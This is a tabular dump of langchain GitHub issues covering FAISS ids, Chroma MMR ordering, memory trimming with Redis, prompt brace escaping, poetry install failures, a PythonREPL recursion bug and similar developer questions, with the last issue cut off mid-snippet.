issue_owner_repo (list, lengths 2-2) | issue_body (string, lengths 0-261k, nullable ⌀) | issue_title (string, lengths 1-925) | issue_comments_url (string, lengths 56-81) | issue_comments_count (int64, 0-2.5k) | issue_created_at (string, lengths 20-20) | issue_updated_at (string, lengths 20-20) | issue_html_url (string, lengths 37-62) | issue_github_id (int64, 387k-2.46B) | issue_number (int64, 1-127k) |
---|---|---|---|---|---|---|---|---|---|
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.173
faiss-cpu 1.7.4
python 3.10.11
Void linux
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
It's a logic error in langchain.vectorstores.faiss.__add()
https://github.com/hwchase17/langchain/blob/0c3de0a0b32fadb8caf3e6d803287229409f9da9/langchain/vectorstores/faiss.py#L94-L100
https://github.com/hwchase17/langchain/blob/0c3de0a0b32fadb8caf3e6d803287229409f9da9/langchain/vectorstores/faiss.py#L118-L126
The id cannot be specified as a function argument. This makes it impossible, for instance, to detect duplicate additions.
### Expected behavior
It should be possible to specify the ids of inserted documents/texts using the add_documents/add_texts methods, as is already possible with the Chroma object's methods.
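For illustration, a minimal sketch (my own, not from the original report) of the content-hash approach mentioned just below, using Chroma's existing `ids` parameter; `texts` and `chroma_store` are hypothetical names:
```python
import hashlib

# derive deterministic ids from content so re-adding the same text yields the same id
ids = [hashlib.sha256(t.encode("utf-8")).hexdigest() for t in texts]
chroma_store.add_texts(texts=texts, ids=ids)  # the request is for FAISS to accept ids the same way
```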
As a side-effect, this ability would also fix the inability to remove duplicates (see https://github.com/hwchase17/langchain/issues/2699 and https://github.com/hwchase17/langchain/issues/3896 ) by using ids unique to the content (I use a hash, for example). | FAISS should allow you to specify id when using add_text | https://api.github.com/repos/langchain-ai/langchain/issues/5065/comments | 6 | 2023-05-21T16:39:28Z | 2023-05-25T05:26:48Z | https://github.com/hwchase17/langchain/issues/5065 | 1,718,564,503 | 5,065 |
[
"hwchase17",
"langchain"
]
| https://github.com/hwchase17/langchain/blob/424a573266c848fe2e53bc2d50c2dc7fc72f2c15/langchain/vectorstores/chroma.py#L275
The line above would only select the candidates based on MMR, and not reorder them based on MMR's ranking.
This is not the case for the other vectorstores that support MMR.
cc @hwchase17
| [Bug] MMR ordering is not preserved for the Chroma Vectorstore | https://api.github.com/repos/langchain-ai/langchain/issues/5061/comments | 3 | 2023-05-21T15:50:19Z | 2023-09-17T17:16:54Z | https://github.com/langchain-ai/langchain/issues/5061 | 1,718,549,470 | 5,061 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am using BabyAGI with the ZeroShotAgent, and the prompt length error is persistent. How can we fix it, possibly by summarising the agent_scratchpad? Also, could someone explain how the agent_scratchpad works by default: does it keep appending every bot and human response, or just the previous ones?
### Suggestion:
_No response_ | Issue: How do I fix the prompt length error in any agent that uses LLMChain? | https://api.github.com/repos/langchain-ai/langchain/issues/5057/comments | 2 | 2023-05-21T12:42:59Z | 2023-09-10T16:14:20Z | https://github.com/langchain-ai/langchain/issues/5057 | 1,718,490,382 | 5,057 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
By way of example from the official docs,
```python
memory = ConversationTokenBufferMemory(llm=llm, max_token_limit=10)
memory.save_context({"input": "hi"}, {"output": "what's up"})
memory.save_context({"input": "not much you"}, {"output": "not much"})
memory.load_memory_variables({})
```
With this memory class alone, when the stored messages exceed the given token limit, the memory is trimmed normally. But if a persistent message history is attached, the memory is not trimmed. For example:
```python
history = RedisChatMessageHistory(url=redis_url, ttl=600, session_id='id')
memory = ConversationTokenBufferMemory(llm=llm, max_token_limit=10, chat_memory=history)
memory.save_context({"input": "hi"}, {"output": "what's up"})
memory.save_context({"input": "not much you"}, {"output": "not much"})
memory.load_memory_variables({})
```
You will find that the token limit is exceeded and all the historical messages are printed out.
This will cause your code to fail to work properly for a period of time, until the Redis TTL expires.
At present, my approach is to define a custom TokenMemory class. The following code is for reference only; if you have a better way to implement it, you are welcome to discuss it.
```python
# imports added for completeness; paths are my assumption for langchain ~0.0.17x
from typing import Any, Dict, List

from langchain.base_language import BaseLanguageModel
from langchain.memory.chat_memory import BaseChatMemory
from langchain.schema import BaseMessage, get_buffer_string


class CustomTokenMemory(BaseChatMemory):
    new_buffer: List = []
    human_prefix: str = "Human"
    ai_prefix: str = "AI"
    llm: BaseLanguageModel
    memory_key: str = "history"
    max_token_limit: int = 2000

    @property
    def buffer(self) -> List[BaseMessage]:
        """String buffer of memory."""
        if not self.new_buffer:
            self.prune_memory()
        return self.new_buffer

    @property
    def memory_variables(self) -> List[str]:
        """Will always return list of memory variables.

        :meta private:
        """
        return [self.memory_key]

    def load_memory_variables(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
        """Return history buffer."""
        buffer: Any = self.buffer
        if self.return_messages:
            final_buffer: Any = buffer
        else:
            final_buffer = get_buffer_string(
                buffer,
                human_prefix=self.human_prefix,
                ai_prefix=self.ai_prefix,
            )
        return {self.memory_key: final_buffer}

    def save_context(self, inputs: Dict[str, Any], outputs: Dict[str, str]) -> None:
        """Save context from this conversation to buffer. Pruned."""
        super().save_context(inputs, outputs)
        self.prune_memory()

    def prune_memory(self):
        # Prune buffer if it exceeds max token limit
        buffer = self.chat_memory.messages
        curr_buffer_length = self.llm.get_num_tokens_from_messages(buffer)
        while curr_buffer_length > self.max_token_limit:
            buffer.pop(0)
            curr_buffer_length = self.llm.get_num_tokens_from_messages(buffer)
        self.new_buffer = buffer
```
Here I define a new_buffer list that points to the pruned memory. In ConversationTokenBufferMemory, self.buffer always fetches all the messages in Redis, so even if the memory is pruned in save_context, load_memory_variables still returns the full history. With my change, when new_buffer is empty the historical messages are first fetched from Redis and pruned once, which guarantees that the returned messages stay within the token limit. This mainly handles rare scenarios, such as when your service goes down or restarts and the in-memory messages disappear. Although this is not necessary in most cases, once new messages arrive the buffer is replaced by new_buffer, and load_memory_variables then returns the pruned memory.
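A short usage sketch of the class above (my own illustration; the Redis URL and session id are placeholders):
```python
history = RedisChatMessageHistory(url=redis_url, ttl=600, session_id="id")
memory = CustomTokenMemory(llm=llm, max_token_limit=10, chat_memory=history)
memory.save_context({"input": "hi"}, {"output": "what's up"})
memory.save_context({"input": "not much you"}, {"output": "not much"})
memory.load_memory_variables({})  # now stays within the token limit even after a restart
```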
### Suggestion:
_No response_ | The problem that ConversationTokenBufferMemory cannot be trimmed normally due to the use of persistent messages | https://api.github.com/repos/langchain-ai/langchain/issues/5053/comments | 4 | 2023-05-21T10:41:45Z | 2024-05-20T08:01:06Z | https://github.com/langchain-ai/langchain/issues/5053 | 1,718,455,217 | 5,053 |
[
"hwchase17",
"langchain"
]
| ### System Info
I'm working on Q&A over PDFs and other documents using OpenAI. Below is the code:
```python
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import Chroma
from langchain import OpenAI, VectorDBQA
import pickle
import textwrap
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.llms import OpenAI
from langchain.chains import RetrievalQA
from langchain.document_loaders import PyPDFLoader, DirectoryLoader
import os
import warnings

warnings.filterwarnings("ignore")

# Set up the environment variable for the OpenAI API key
os.environ["OPENAI_API_KEY"] = ""


def get_documents(folder_path, file_extension):
    documents = []
    if file_extension == 'pdf':
        pdf_loader = DirectoryLoader(folder_path, glob="./*.pdf", loader_cls=PyPDFLoader)  # Select PDF files
        documents += pdf_loader.load()
    elif file_extension == 'txt':
        txt_loader = DirectoryLoader(folder_path, glob="./*.txt")  # Select TXT files
        documents += txt_loader.load()
    elif file_extension == 'combined':
        pdf_loader = DirectoryLoader(folder_path, glob="./*.pdf", loader_cls=PyPDFLoader)  # Select PDF files
        documents += pdf_loader.load()
        txt_loader = DirectoryLoader(folder_path, glob="./*.txt")  # Select TXT files
        documents += txt_loader.load()
    else:
        return None
    return documents


def get_query_result(query, documents):
    # Split documents
    text_splitter = RecursiveCharacterTextSplitter(chunk_size=2000, chunk_overlap=200)
    texts = text_splitter.split_documents(documents)

    # Query documents
    embeddings = OpenAIEmbeddings(openai_api_key=os.environ['OPENAI_API_KEY'])
    docsearch = Chroma.from_documents(texts, embeddings)
    qa = VectorDBQA.from_chain_type(llm=OpenAI(), chain_type="stuff", vectorstore=docsearch, return_source_documents=True)
    result = qa({"query": query})
    result_text = result['result'].strip()
    source = result.get('source_documents', [{}])[0].metadata.get('source', '')
    page = result.get('source_documents', [{}])[0].metadata.get('page', '')
    return result_text, source, page


def chat_loop(file_extension, folder_path):
    documents = get_documents(folder_path, file_extension)
    if documents is None:
        print("Invalid folder path or no supported files found.")
        return
    while True:
        query = input("Enter your query (type 'exit' to end): ")
        if query.lower() == 'exit':
            break
        result = get_query_result(query, documents)
        if result is not None:
            result_text, source, page = result
            print("Result:", result_text)
            if source:
                print("Source:", source)
                print("Page:", page)
        else:
            print("No answer found for the query.")
        print()  # Print an empty line for separation


# Get the selected file extension and folder path from the webpage
selected_file_extension = 'combined'
folder_path = 'Documents'

# Start the chat loop
chat_loop(selected_file_extension, folder_path)
```
The code above takes the input PDF or other document text and returns only a single-line answer. In ChatGPT, if we provide a long text or paragraph and ask a question, it gives the answer and also explains where it got the answer and why it is correct. Is it possible to do the same in the code above?
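One possible direction (my own sketch, not part of the original question) is to pass a custom prompt through `chain_type_kwargs` that instructs the model to justify its answer; the prompt wording here is an assumption:
```python
from langchain.prompts import PromptTemplate

explain_prompt = PromptTemplate(
    template=(
        "Use the context below to answer the question, then explain which "
        "passage supports the answer and why it is correct.\n\n"
        "Context:\n{context}\n\nQuestion: {question}\nDetailed answer:"
    ),
    input_variables=["context", "question"],
)
qa = RetrievalQA.from_chain_type(
    llm=OpenAI(),
    chain_type="stuff",
    retriever=docsearch.as_retriever(),
    chain_type_kwargs={"prompt": explain_prompt},
    return_source_documents=True,
)
```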
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Looking for a better explanation of the answer instead of returning just a single-line answer.
### Expected behavior
Expecting the answers to be returned with a better explanation and articulation. | Regarding explanation of the answer returned by OpenAI embeddings | https://api.github.com/repos/langchain-ai/langchain/issues/5052/comments | 1 | 2023-05-21T10:11:49Z | 2023-09-10T16:14:25Z | https://github.com/langchain-ai/langchain/issues/5052 | 1,718,447,024 | 5,052 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hey,
I want to use the { and } characters in my prompt template (I want to prompt my chain to generate CSS code), but this produces the following error:
```
Traceback (most recent call last):
File "/Users/thomas/workspace/j4rvis/j4rvis/tools/document_tools.py", line 43, in <module>
prompt=PromptTemplate(
^^^^^^^^^^^^^^^
File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for PromptTemplate
__root__
Invalid prompt schema; check for mismatched or missing input parameters. ' ' (type=value_error)
```
How can I escape those characters so they don't get interpreted as input_variables?
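For reference, a minimal sketch (assuming the default f-string template format, where doubling the braces escapes them, as with `str.format`):
```python
from langchain.prompts import PromptTemplate

# double the braces so they are treated as literal characters, not input variables
prompt = PromptTemplate(
    input_variables=["selector"],
    template="Write CSS for {selector}: {{ color: red; }}",
)
print(prompt.format(selector=".button"))  # -> Write CSS for .button: { color: red; }
```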
### Suggestion:
_No response_ | Issue: Escaping { and } chars in a langchain.prompts.PromptTemplate | https://api.github.com/repos/langchain-ai/langchain/issues/5051/comments | 4 | 2023-05-21T09:25:49Z | 2023-09-22T16:08:39Z | https://github.com/langchain-ai/langchain/issues/5051 | 1,718,432,064 | 5,051 |
[
"hwchase17",
"langchain"
]
| ### System Info
MacOS Ventura, zshell
`pyenv virtualenv 3.11 langchain`, clean environment
`pyenv local langchain`, automatically activate environment
`curl -sSL https://install.python-poetry.org | python -`, install poetry
`export PATH="/Users/steven/.local/bin:$PATH"`, added this to make poetry accessible
`pip install --upgrade pip`
`pip install torch`
`poetry install -E all`
yields the following output. Strange.
```bash
• Installing torch (1.13.1): Failed
RuntimeError
Unable to find installation candidates for torch (1.13.1)
at ~/Library/Application Support/pypoetry/venv/lib/python3.11/site-packages/poetry/installation/chooser.py:76 in choose_for
72│
73│ links.append(link)
74│
75│ if not links:
→ 76│ raise RuntimeError(f"Unable to find installation candidates for {package}")
77│
78│ # Get the best link
79│ chosen = max(links, key=lambda link: self._sort_key(package, link))
80│
```
### Who can help?
@hwchase17 This is install related and while I have langchain running fine from pip in another virtual environment running the same python version (3.11.3), things with poetry are not working well.
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
MacOS Ventura, zshell
`pyenv virtualenv 3.11 langchain`, clean environment
`pyenv local langchain`, automatically activate environment
`curl -sSL https://install.python-poetry.org | python -`, install poetry
`export PATH="/Users/steven/.local/bin:$PATH"`, added this to make poetry accessible
`pip install --upgrade pip`
`pip install torch`
`poetry install -E all`
### Expected behavior
```bash
• Installing torch (1.13.1): Failed
RuntimeError
Unable to find installation candidates for torch (1.13.1)
at ~/Library/Application Support/pypoetry/venv/lib/python3.11/site-packages/poetry/installation/chooser.py:76 in choose_for
72│
73│ links.append(link)
74│
75│ if not links:
→ 76│ raise RuntimeError(f"Unable to find installation candidates for {package}")
77│
78│ # Get the best link
79│ chosen = max(links, key=lambda link: self._sort_key(package, link))
80│
``` | poetry install -E all` fails because `torch` undetected | https://api.github.com/repos/langchain-ai/langchain/issues/5048/comments | 10 | 2023-05-21T05:19:15Z | 2024-02-13T16:16:32Z | https://github.com/langchain-ai/langchain/issues/5048 | 1,718,375,450 | 5,048 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi,
for the following code there is a dimension error: `InvalidDimensionException: Dimensionality of (1536) does not match index dimensionality (384)`
```python
embeddingsFunction = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1)
persist_directory = "chromaDB_csv"

vectordb = None
vectordb = Chroma.from_documents(
    documents=docs, embeddings=embeddingsFunction, persist_directory=persist_directory
)
vectordb.persist()

AzureOpenAI.api_type = "azure"
llm = AzureChatOpenAI(
    deployment_name="gpt-35-turbo",
    engine="gpt-35-turbo",
    openai_api_base=os.getenv('OPENAI_API_BASE'),
    openai_api_key=os.getenv("OPENAI_API_KEY"),
    openai_api_type="azure",
    openai_api_version="2023-03-15-preview",
)
print(os.getenv('OPENAI_API_BASE'))
print(os.getenv('OPENAI_API_KEY'))

vectordb = Chroma(persist_directory=persist_directory, embedding_function=embeddingsFunction)

search_kwargs = {
    "maximal_marginal_relevance": True,
    "distance_metric": "cos",
    "fetch_k": 100,
    "k": 10,
}
retriever = vectordb.as_retriever(search_type="mmr", search_kwargs=search_kwargs)

chain = ConversationalRetrievalChain.from_llm(
    llm,
    retriever=retriever,
    chain_type="stuff",
    verbose=True,
    max_tokens_limit=4096,
)
chain({"question": "ABC ABC ABC ABC", "chat_history": []})
```
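One thing worth checking (my observation, not stated in the original report): `Chroma.from_documents` takes the embedding function through the `embedding` parameter, so the `embeddings=` keyword above may be silently ignored, leaving the default 384-dimension embedding function in use at build time while the 1536-dimension OpenAI function is used at query time, which would match the reported mismatch. A sketch of the corrected call:
```python
vectordb = Chroma.from_documents(
    documents=docs,
    embedding=embeddingsFunction,  # note: the parameter is `embedding`, not `embeddings`
    persist_directory=persist_directory,
)
```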
### Suggestion:
_No response_ | Issue: Chroma DB | https://api.github.com/repos/langchain-ai/langchain/issues/5046/comments | 20 | 2023-05-20T20:35:07Z | 2024-07-29T09:33:13Z | https://github.com/langchain-ai/langchain/issues/5046 | 1,718,283,195 | 5,046 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi All,
I'm developing a chatbot that runs over PDF documents stored in Pinecone.
I have an agent that uses one tool (in my case a `ConversationalRetrievalChain`); the chain works perfectly when I ask any question.
But when I pass this chain to the agent as a tool, I get unexpected results.
For example, when I asked "Who is Leo Messi?" (of course I have no information about him in my PDF file), I got a real answer: "Leo Messi is an Argentinian soccer player......"
I noticed that the agent answers the question by itself and doesn't run the tool I provided.
I have tried to edit the agent's prompt so that it won't answer from its own knowledge, but without success.
Has anyone faced this too?
Thanks for the help!
### Suggestion:
_No response_ | Agent answers questions that are not related to my custom data | https://api.github.com/repos/langchain-ai/langchain/issues/5044/comments | 6 | 2023-05-20T19:42:03Z | 2023-09-11T08:17:08Z | https://github.com/langchain-ai/langchain/issues/5044 | 1,718,266,994 | 5,044 |
[
"hwchase17",
"langchain"
]
| ### System Info
"langchain": "^0.0.75"
"@supabase/supabase-js": "^2.21.0"
### Who can help?
@hwchase17
### Information
- [x] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```js
export const query = async (query) => {
  const model = new ChatOpenAI({
    modelName: 'gpt-3.5-turbo',
  });

  const vectorStore = await SupabaseVectorStore.fromExistingIndex(
    new OpenAIEmbeddings(),
    {
      client: SUPABASE_CLIENT,
      tableName: 'documents',
      queryName: 'match_documents_with_filters',
      filter: { email: '[email protected]' }, // able to filter by name with this, as stored in the db
    }
  );

  const memory = new VectorStoreRetrieverMemory({
    vectorStoreRetriever: vectorStore.asRetriever(5),
    memoryKey: 'history',
  });

  await memory.saveContext(
    { input: 'My favorite sport is soccer' },
    { output: '...' }
  ); // this is not working when using metadata filtering

  const prompt =
    PromptTemplate.fromTemplate(`The following is a friendly conversation between a human and an AI. The AI is talkative and provides lots of specific details from its context. If the AI does not know the answer to a question, it truthfully says it does not know.

Relevant pieces of conversation:
{history}
(You do not need to use these pieces of information if not relevant to your question)

Current conversation:
Human: {input}
AI:`);

  const chain = new LLMChain({ llm: model, prompt: prompt, memory: memory });
  const res2 = await chain.call({ input: query });
  console.log({ res2 });
  return res2;
};

query('what is my name? and what is my favorite sport?');
```
### Expected behavior
The name in the db is stored as abc.
I can retrieve it using the filter, but the favorite sport is missing from the answer.
output: "Your name is abc. As for your favorite sport, I don't have that information. Would you like me to look it up for you?"
expected output: "Your name is abc and your favorite sport is soccer."
I can get the favorite sport as soccer if I don't use filtering, but then the name is missing. | not able to use memory.saveContext and metadata filtering together | https://api.github.com/repos/langchain-ai/langchain/issues/5043/comments | 2 | 2023-05-20T19:14:01Z | 2023-05-30T18:17:46Z | https://github.com/langchain-ai/langchain/issues/5043 | 1,718,260,661 | 5,043 |
[
"hwchase17",
"langchain"
]
| ### System Info
I have tried to run the AzureOpenAI embedding example from here: https://python.langchain.com/en/latest/modules/models/text_embedding/examples/azureopenai.html
Doing so, I get the following error:
`InvalidRequestError: Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.embedding.Embedding'>`
I am using the current versions:
```
openai==0.27.7
langchain==0.0.174
```
I have even followed what is described in issue #1560, to no avail.
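For context, a sketch of passing the Azure deployment explicitly (my assumption about the setup; the resource and deployment names are placeholders):
```python
import os
from langchain.embeddings import OpenAIEmbeddings

os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-resource>.openai.azure.com/"
os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview"

# `deployment` must name your Azure embedding deployment, not the model name
embeddings = OpenAIEmbeddings(deployment="my-ada-002-deployment", chunk_size=1)
```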
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://python.langchain.com/en/latest/modules/models/text_embedding/examples/azureopenai.html
### Expected behavior
No errors | AzureOpenAI example error (embeddding) | https://api.github.com/repos/langchain-ai/langchain/issues/5042/comments | 2 | 2023-05-20T18:11:22Z | 2023-05-20T20:27:10Z | https://github.com/langchain-ai/langchain/issues/5042 | 1,718,245,431 | 5,042 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to access dolly-v2-3b with Langchain and HuggingFaceHub, following the tutorial provided on the [website](https://python.langchain.com/en/latest/modules/models/llms/integrations/huggingface_hub.html).
However I am facing a few issues.
1. The instruction `!pip install huggingface_hub > /dev/null` does not work. The error output is: "The system cannot find the path specified."
2. When using the example code to access dolly-v2-3b from the Hugging Face Hub, the following code only produces a single word of output:
```python
from langchain import HuggingFaceHub

repo_id = "databricks/dolly-v2-3b"
llm = HuggingFaceHub(repo_id=repo_id, model_kwargs={"temperature": 0, "max_length": 64})
```
I have also tried changing the max_length and temperature, but this makes no difference.
### Suggestion:
_No response_ | Issue: Accessing Dolly-v2-3b via HuggingFaceHub and langchain | https://api.github.com/repos/langchain-ai/langchain/issues/5040/comments | 2 | 2023-05-20T16:05:33Z | 2023-09-15T16:12:11Z | https://github.com/langchain-ai/langchain/issues/5040 | 1,718,214,309 | 5,040 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
Within the documentation, in the last sentence, "change" should be **charge**.
Reference link: https://python.langchain.com/en/latest/modules/agents.html
<img width="511" alt="image" src="https://github.com/hwchase17/langchain/assets/67931050/52f6eacd-7930-451f-abd7-05eca9479390">
### Idea or request for content:
I propose correcting the misspelling, since "change" does not make sense here: the Action Agent is supposed to be in charge of the execution.
[
"hwchase17",
"langchain"
]
| ### System Info
MacOS, Python 3.11.2, langchain 0.0.174
### Who can help?
@vowelparrot
### Information
- [X] My own modified scripts
### Related Components
- [X] Tools / Toolkits
### Reproduction
I hit a strange error when using PythonREPL in an agent. It happens with this **recursive** Python function. It was written by gpt-3.5-turbo and is valid Python:
```python
def fibonacci(n):
    if n <= 1:
        return n
    else:
        return fibonacci(n-1) + fibonacci(n-2)  # <-- this line will trigger the NameError

print(fibonacci(10))
```
Note that everything works as expected for non-recursive functions.
Using this function as string input, I reduced the issue to this minimal example:
```python
from langchain.utilities import PythonREPL
python_repl = PythonREPL()
cmd = "def fibonacci(n):\n if n <= 1:\n return n\n else:\n return fibonacci(n-1) + fibonacci(n-2)\nprint(fibonacci(10))"
python_repl.run(cmd)
```
> $ python t.py
> NameError("name 'fibonacci' is not defined")
When executed with `exec(cmd)`, it runs as expected. I found that `PythonREPL` runs the command with `exec(command, self.globals, self.locals)`.
Setting globals & locals in this `python_repl` instance makes the fragment work as expected:
```python
# [... as before ...]
python_repl.globals = globals()
python_repl.locals = locals()
python_repl.run(cmd)
```
This hack solves it only in the context of this simple example, but not if `python_repl` added as a tool to an `AgentExecutor`.
At the core, the issue seems to be caused by Python's scoping rules for `exec`: when distinct `globals` and `locals` mappings are passed, the function object is bound in `locals`, but name lookups inside the function body resolve through the `globals` dict given to `exec`, where `fibonacci` was never bound, which is why the NameError is raised.
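A plain-Python demonstration of the same scoping behavior, independent of langchain (my own illustration):
```python
cmd = (
    "def f(n):\n"
    "    return 1 if n <= 1 else n * f(n - 1)\n"
    "print(f(5))"
)
try:
    exec(cmd, {}, {})    # separate globals/locals: f is bound in locals,
except NameError as e:   # but the recursive call resolves through globals
    print(e)             # -> name 'f' is not defined
exec(cmd, {})            # one mapping serves as both: prints 120
```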
### Expected behavior
I would have expected `PythonREPL` to accept recursive functions. | Reproducible NameError with recursive function in PythonREPL() | https://api.github.com/repos/langchain-ai/langchain/issues/5035/comments | 2 | 2023-05-20T14:08:20Z | 2024-06-07T08:08:18Z | https://github.com/langchain-ai/langchain/issues/5035 | 1,718,183,052 | 5,035 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Have we considered the ability for an agent to spawn and manage other agents? It would be nice to be able to continue chatting with the main agent while other agents execute queries in the background.
Is this possible today? If so, what class should be used? If not, have we thought about how we might do it?
### Motivation
The ability for an agent to spawn and manage other agents.
### Your contribution
I've got some ideas on how we might manage this using asyncio and an event loop but don't want to jump the gun if we've already discussed it. | Spawning and managing agents | https://api.github.com/repos/langchain-ai/langchain/issues/5033/comments | 3 | 2023-05-20T12:50:55Z | 2023-09-10T16:14:41Z | https://github.com/langchain-ai/langchain/issues/5033 | 1,718,162,981 | 5,033 |
[
"hwchase17",
"langchain"
]
| ### Feature request
We want to request the addition of OAuth 2.0 support to the langchain package. OAuth 2.0 is a widely adopted industry-standard protocol for authorization. It would be immensely beneficial if langchain could incorporate this feature into its framework.
### Motivation
Our organization and many others are looking to use langchain for various internal projects. OAuth 2.0 support would significantly streamline integrating these projects with other systems in our ecosystem, which already use OAuth 2.0 for secure authorization.
Furthermore, langchain, a leading framework for large language model development, would significantly increase its appeal and utility by supporting OAuth 2.0. It would allow for more secure and efficient development, paramount in today's data-centric world.
This feature would not only benefit our organization but would also be advantageous for the wider langchain community. Furthermore, the addition of OAuth 2.0 support could potentially expand the usage and applicability of the langchain package across various domains and organizations.
### Your contribution
I can provide feedback on industry needs. | OAuth 2.0 Support | https://api.github.com/repos/langchain-ai/langchain/issues/5032/comments | 3 | 2023-05-20T12:19:52Z | 2023-09-19T16:09:50Z | https://github.com/langchain-ai/langchain/issues/5032 | 1,718,155,380 | 5,032 |
[
"hwchase17",
"langchain"
]
| ### System Info
aiohttp==3.8.4
aiosignal==1.3.1
aniso8601==9.0.1
anyio==3.6.2
async-timeout==4.0.2
attrs==23.1.0
backoff==2.2.1
blinker==1.6.2
certifi==2023.5.7
charset-normalizer==3.1.0
chromadb==0.3.23
click==8.1.3
clickhouse-connect==0.5.24
colorama==0.4.6
dataclasses-json==0.5.7
duckdb==0.8.0
environs==9.5.0
fastapi==0.95.2
filelock==3.12.0
Flask==2.3.2
Flask-RESTful==0.3.9
frozenlist==1.3.3
fsspec==2023.5.0
greenlet==2.0.2
grpcio==1.53.0
h11==0.14.0
hnswlib==0.7.0
httptools==0.5.0
huggingface-hub==0.14.1
idna==3.4
itsdangerous==2.1.2
Jinja2==3.1.2
joblib==1.2.0
langchain==0.0.174
lz4==4.3.2
MarkupSafe==2.1.2
marshmallow==3.19.0
marshmallow-enum==1.5.1
monotonic==1.6
mpmath==1.3.0
multidict==6.0.4
mypy-extensions==1.0.0
networkx==3.1
nltk==3.8.1
numexpr==2.8.4
numpy==1.24.3
openai==0.27.6
openapi-schema-pydantic==1.2.4
packaging==23.1
pandas==2.0.1
Pillow==9.5.0
posthog==3.0.1
protobuf==4.23.1
pydantic==1.10.7
pymilvus==2.2.8
python-dateutil==2.8.2
python-dotenv==1.0.0
pytz==2023.3
PyYAML==6.0
regex==2023.5.5
requests==2.30.0
scikit-learn==1.2.2
scipy==1.10.1
sentence-transformers==2.2.2
sentencepiece==0.1.99
six==1.16.0
sniffio==1.3.0
SQLAlchemy==2.0.13
starlette==0.27.0
sympy==1.12
tenacity==8.2.2
threadpoolctl==3.1.0
tiktoken==0.4.0
tokenizers==0.13.3
torch==2.0.1
torchvision==0.15.2
tqdm==4.65.0
transformers==4.29.2
typing-inspect==0.8.0
typing_extensions==4.5.0
tzdata==2023.3
ujson==5.7.0
urllib3==2.0.2
uvicorn==0.22.0
watchfiles==0.19.0
websockets==11.0.3
Werkzeug==2.3.4
yarl==1.9.2
zstandard==0.21.0
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Reproduction Steps:
1. Create an instance of the Collection class.
2. Initialize the LangChain object and make sure it is properly configured.
3. Create a Document object and set its page_content and metadata attributes appropriately.
4. Call the update_document method on the LangChain object, passing the document_id and document as arguments.
Expected Result:
The update_document method should update the specified document in the collection with the provided text and metadata.
Actual Result:
An AttributeError is raised with the following traceback:
```plain
File "E:\AI Projects\flask-backend\venv\lib\site-packages\langchain\vectorstores\chroma.py", line 351, in update_document
self._collection.update_document(document_id, text, metadata)
AttributeError: 'Collection' object has no attribute 'update_document'
```
Note that the error occurs in langchain's chroma.py, in the `update_document` method of the `Chroma` class, when it calls `update_document` on the underlying chromadb `Collection` object, which has no such attribute.
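A possible workaround (my own sketch; I have not verified it against chromadb 0.3.23) is to call the underlying chromadb `Collection.update` method directly:
```python
# hypothetical workaround until langchain's Chroma.update_document matches the chromadb API
vectordb._collection.update(
    ids=[document_id],
    documents=[document.page_content],
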